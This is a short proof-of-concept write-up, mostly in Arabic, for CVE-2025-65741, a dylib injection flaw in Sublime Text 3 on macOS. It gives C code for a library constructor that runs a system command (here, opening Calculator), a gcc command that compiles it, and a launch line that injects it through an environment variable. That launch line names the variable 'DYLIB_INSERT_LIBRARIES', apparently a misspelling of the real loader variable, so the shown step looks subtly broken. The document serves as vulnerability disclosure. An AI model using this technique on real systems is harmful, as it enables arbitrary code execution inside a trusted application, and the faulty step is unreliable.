
إثبات المفهوم لـ CVE-2025-65741 يوضح حقن dylib في Sublime Text 3 على macOS عبر كود غير موقع، مع حمولة .dylib مجمعة وخطوات الاستغلال.
Download: https://www.sublimetext.com/3
CVE: CVE-2025-65741 | https://nvd.nist.gov/vuln/detail/CVE-2025-65741
Author: Vinicius Batistella
Version Affected: Sublime Text 3 Build 3208 or prior for macOS
لا يتحقق تطبيق Sublime Text بشكل صحيح من حقن الشيفرة غير الموقّعة، مما يسمح للمهاجم بتجميع مكتبة .dylib وإجبار التطبيق على تشغيلها في سياق التطبيق. في المثال التالي، تم إجبار تطبيق Sublime Text على فتح الثنائي calc. تم إصلاح هذه الثغرة في الإصدار Build 3209 وما بعده.
#include <stdio.h>
#include <stdlib.h>
__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
printf("[+] Dynalic Library Injection: %s\n", argv[0]);
system("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
}
gcc -dynamiclib injection.c -arch x86_64 -o injection_x86.dylib
DYLIB_INSERT_LIBRARIES=injection_x86.dylib /Applications/Sublime\ Text.app/Contents/MacOS/Sublime\ Text